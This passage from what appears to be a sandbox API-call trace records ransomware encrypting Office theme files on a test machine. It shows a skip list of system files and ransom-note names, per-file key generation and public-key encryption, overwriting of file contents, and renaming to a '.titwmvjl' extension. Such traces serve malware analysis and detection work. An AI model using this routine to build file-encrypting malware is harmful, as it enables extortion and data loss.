lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="ntuser.dat.log") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="thumbs.db") returned 1 [0077.529] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="ntldr") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="NTDETECT.COM") returned 1 [0077.530] lstrcmpiW (lpString1="TM10001105[[fn=Crop]].thmx", lpString2="Bootfont.bin") returned 1 [0077.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx") returned 128 [0077.530] lstrlenW (lpString=".thmx") returned 5 [0077.530] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.530] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0077.530] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.530] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.530] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001105[[fn=crop]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0077.531] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.531] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0077.537] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.537] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.538] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.538] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.538] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.538] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0077.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.538] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.538] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.539] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.539] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.539] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.539] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.539] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0077.539] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.540] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.540] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.540] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.540] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.540] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5034b8) returned 1 [0077.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.541] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.541] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.541] GetLastError () returned 0x0 [0077.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.541] CryptDestroyKey (hKey=0x5034b8) returned 1 [0077.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.541] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.541] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.542] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.542] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.542] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x5037b8) returned 1 [0077.542] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.542] CryptGetKeyParam (in: hKey=0x5037b8, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.542] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.542] CryptEncrypt (in: hKey=0x5037b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.543] GetLastError () returned 0x0 [0077.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.543] CryptDestroyKey (hKey=0x5037b8) returned 1 [0077.543] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.543] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.543] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0077.543] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0077.543] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0x8301c, lpOverlapped=0x0) returned 1 [0077.866] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff7cfe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.866] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x8301c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0x8301c, lpOverlapped=0x0) returned 1 [0077.871] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.871] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0077.873] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.878] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.880] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.881] CloseHandle (hObject=0x2ec) returned 1 [0077.889] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001105[[fn=crop]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001105[[fn=Crop]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001105[[fn=crop]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0077.890] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.890] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0077.890] lstrcmpW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2=".") returned 1 [0077.890] lstrcmpW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="..") returned 1 [0077.890] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001106[[fn=Badge]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx" [0077.890] lstrlenW (lpString=".titwmvjl") returned 9 [0077.891] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0077.891] VirtualAlloc (lpAddress=0x0, dwSize=0x142, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0077.891] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx.titwmvjl") returned 138 [0077.891] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0077.891] lstrlenW (lpString=".thmx") returned 5 [0077.891] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.891] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0077.891] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0077.891] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.891] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0077.892] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="desktop.ini") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="autorun.inf") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="ntuser.dat") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="iconcache.db") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="bootsect.bak") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="boot.ini") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="ntuser.dat.log") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="thumbs.db") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="CRAB-DECRYPT.html") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="ntldr") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="NTDETECT.COM") returned 1 [0077.892] lstrcmpiW (lpString1="TM10001106[[fn=Badge]].thmx", lpString2="Bootfont.bin") returned 1 [0077.892] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx") returned 129 [0077.892] lstrlenW (lpString=".thmx") returned 5 [0077.892] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.892] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".thmx ") returned 6 [0077.892] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.892] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.893] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001106[[fn=badge]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ec [0077.893] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.893] ReadFile (in: hFile=0x2ec, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259dfd0*=0x21c, lpOverlapped=0x0) returned 1 [0077.895] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.895] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.895] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.896] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.896] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.896] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.897] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259df8c | out: pbBuffer=0x259df8c) returned 1 [0077.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.897] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.897] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.897] CryptAcquireContextW (in: phProv=0x259df00, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259df00*=0x4cdb38) returned 1 [0077.898] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0077.898] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0077.898] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0077.898] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259dfac | out: pbBuffer=0x259dfac) returned 1 [0077.898] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.899] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.899] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.899] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.899] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.900] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503338) returned 1 [0077.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.900] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.900] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.901] GetLastError () returned 0x0 [0077.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.901] CryptDestroyKey (hKey=0x503338) returned 1 [0077.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.901] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.901] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.901] CryptAcquireContextW (in: phProv=0x259def4, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259def4*=0x4cdb38) returned 1 [0077.902] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.902] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259def8 | out: phKey=0x259def8*=0x503738) returned 1 [0077.902] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.902] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259deec, pdwDataLen=0x259def0, dwFlags=0x0 | out: pbData=0x259deec*=0x800, pdwDataLen=0x259def0*=0x4) returned 1 [0077.902] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.902] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259df24*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259df24*=0x100) returned 1 [0077.903] GetLastError () returned 0x0 [0077.903] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.903] CryptDestroyKey (hKey=0x503738) returned 1 [0077.903] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0077.903] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0077.903] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0077.904] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0077.904] ReadFile (in: hFile=0x2ec, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259dfd0, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259dfd0*=0xa2181, lpOverlapped=0x0) returned 1 [0077.934] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0xfff5de7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.934] WriteFile (in: hFile=0x2ec, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xa2181, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259dfb4*=0xa2181, lpOverlapped=0x0) returned 1 [0077.939] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.940] WriteFile (in: hFile=0x2ec, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259dfb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259dfb4*=0x21c, lpOverlapped=0x0) returned 1 [0077.941] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.946] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.950] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.950] CloseHandle (hObject=0x2ec) returned 1 [0077.963] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001106[[fn=badge]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001106[[fn=Badge]].thmx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm10001106[[fn=badge]].thmx.titwmvjl"), dwFlags=0x1) returned 1 [0077.964] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.964] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259e084 | out: lpFindFileData=0x259e084) returned 1 [0077.964] lstrcmpW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2=".") returned 1 [0077.964] lstrcmpW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="..") returned 1 [0077.964] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM10001114[[fn=Gallery]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx" [0077.964] lstrlenW (lpString=".titwmvjl") returned 9 [0077.964] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0077.964] VirtualAlloc (lpAddress=0x0, dwSize=0x146, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0077.965] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx.titwmvjl") returned 140 [0077.965] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0077.965] lstrlenW (lpString=".thmx") returned 5 [0077.965] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0077.965] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".thmx ") returned 6 [0077.965] lstrcmpiW (lpString1=".thmx", lpString2=".titwmvjl") returned -1 [0077.965] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.965] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0077.965] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM10001114[[fn=Gallery]].thmx") returned 131 [0077.965] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="desktop.ini") returned 1 [0077.965] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="autorun.inf") returned 1 [0077.965] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="ntuser.dat") returned 1 [0077.965] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="iconcache.db") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="bootsect.bak") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="boot.ini") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="ntuser.dat.log") returned 1 [0077.966] lstrcmpiW (lpString1="TM10001114[[fn=Gallery]].thmx", lpString2="thumbs.db") returned 